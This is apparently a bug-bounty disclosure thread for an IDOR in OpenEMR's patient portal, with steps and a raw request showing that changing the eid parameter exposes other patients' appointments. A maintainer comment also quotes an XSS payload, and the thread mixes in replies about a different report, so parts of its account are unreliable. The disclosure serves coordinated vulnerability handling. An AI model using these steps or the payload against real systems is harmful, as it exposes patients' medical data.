Idor disclose other user's appointment in openemr/openemr

Valid

Reported on

Jul 25th 2022

Description:-

In this case an idor allow an attacker to view portal user's appointments

Proof of Concept

1.Goto http://demo.openemr.io/openemr/portal/home.php and then goto my profile >my appointment
2.Click on edit appointment button and capture the request in burp suite 
3. Change eid parameter to any number

poc

GET https://demo.openemr.io/openemr/portal/add_edit_event_user.php?eid=24 <-- Change this to 23,22,25

Host: demo.openemr.io

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://demo.openemr.io/openemr/portal/home.php

X-Requested-With: XMLHttpRequest

DNT: 1

Connection: keep-alive

Cookie: PortalOpenEMR=Sessionid

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin

Pragma: no-cache

Cache-Control: no-cache




# Impact

An attacker can view all Appointments
We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller
a year ago

Maintainer

Hi @Distorted_Hacker , I was unable to confirm this. I used same portal demo link in step 1 above and entered Phil"><img src=x onerror=prompt(2)> into First name field (in My Profile) in step 2. Step 3 is a bit confusing since can't go to direct link like that (I ended up needing to log into openemr at https://demo.openemr.io/openemr for step 3 (also unclear if you meant to have a discrepancy in http in step 1 and then https in step 3)).

Brady Miller
a year ago

Maintainer

Used wrong name on above message, meant for this to go to @gaurav-g2

Distorted_Hacker
a year ago

Researcher

Hi @bradymiller after 2nd step we have to login as admin in 3rd step and then visit portal audits section here admin will receive 401 error and he cannot access portal audit section

Distorted_Hacker
a year ago

Researcher

sorry i mean 3rd step we have to login as admin . And in 1st and 2nd step login as patient

stephen waite
a year ago

Maintainer

unable to reproduce this morning @gaurav-g2 at https://demo.openemr.io/openemr/interface/login/login.php?site=default, can you try again please? thank you

stephen waite
a year ago

Maintainer

this happens when you are logged into the openemr portal and the openemr app in the same browser session, once you log out of the portal the access is restored

We have sent a second follow up to the openemr team. We will try again in 10 days. a year ago
Distorted_Hacker modified the report
a year ago
Distorted_Hacker
a year ago

Researcher

Hi @bradymiller check out new update

We have sent a third and final follow up to the openemr team. This report is now considered stale. a year ago
stephen waite validated this vulnerability a year ago

Thanks for the report. A preliminary fix has been posted in commit 86c1c443e0643eed82e2a66da4573fb71f73cbcd

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, then will be ok to make CVE # and make it public.

Thanks!

Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. a year ago
Brady Miller marked this as fixed in 7.0.0.2 with commit 235b19 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability a year ago
Brady Miller
a year ago

Maintainer

@admin, please assign a CVE. thanks!

to join this conversation